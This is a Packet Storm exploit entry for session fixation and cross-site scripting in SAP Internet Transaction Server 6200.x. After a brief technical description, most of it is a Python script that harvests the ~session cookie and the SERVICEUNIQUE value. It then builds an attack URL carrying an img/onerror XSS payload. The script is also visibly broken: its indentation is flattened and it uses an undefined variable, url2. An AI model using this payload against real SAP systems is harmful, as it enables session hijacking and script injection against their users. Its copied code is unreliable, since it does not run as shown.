SAP Internet Transaction Server 6200.x Session Fixation / Cross Site Scripting

Type packetstorm
Reporter J. Carillo Lencina
Modified 2018-05-25T00:00:00


                                            `# Exploit Title: SAP Internet Transaction Server (ITS) 6200.X.X - Session Fixation/ Cross-Site Scripting  
# Dork: /scripts/wgate/  
# Date: 25.05.2018  
# Exploit Author: J. Carrillo Lencina (0xd0m7)  
# Vendor Homepage:  
# Version: SAP ITS 6200.X.X  
# Category: Webapps  
# Tested on: All Platforms  
# CVE:  
# Description:As it has been determined that there are two  
vulnerabilities in the latest developed version of SAP ITS, these two  
vulnerabilities added together give rise to an XSS.  
#Technical details: It has been determined that when an unauthenticated  
user navigates through the application, the application assigns a cookie,  
that cookie is assigned in the parameter ~ session, therefore it could be  
possible for an attacker to fix the fallo ~ session through a request GET  
This, together with the fact that the parameter SERVICEUNIQUE has a  
parameter validation failure, results in a single-use XSS, since the  
session expires once the method of the request is exchanged and fixed in  
the URL.  
import argparse  
import requests  
import re  
parser = argparse.ArgumentParser()  
parser.add_argument("-u", "--url", help="Example:!")  
args = parser.parse_args()  
cookie={'s_fid':'3B9C1B379A11790F-00A298287FA44BF5','s_lv':'1524222141316', 's_nr':'1524222141322-New', 's_vnum':'1555758141333%26vn%3D1'}  
if args.url:  
r = requests.get(args.url,verify=False,cookies=cookie)  
header = r.headers['Set-Cookie']  
cookie_val = header.split(";")  
for line in r.iter_lines():  
if line.find('~SERVICEUNIQUE') > 0:  
param = line.replace('"','')  
v = param.split('=')  
val0 = v[3].split(' ')  
print '[+]Random Value:',val0[0]  
for line2 in range(len(cookie_val)):  
if cookie_val[line2].find('~session') == 0:  
val1 = cookie_val[line2].split('=')  
print '[+]Session Value:',val1[1]  
print '[+] Vulnerable URL:'+url2+val0[0]+'%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e/?%7ESERVICEUNIQUE='+val0[0]+'%3cimg%20src%3da%20onerror%3dalert(1)%3e&%7Eclientinput=1&%7Elogininput=1&%7Epasswdinput=1&%7Eclient=100&%7Elogin=%3F&%7Epassword=aaaaa&%7EPOV=P&%7EOkCode%3D%2F0=Entrar&~session='+val1[1]  
print '[!] Empty URL, please see help (-h,--help)'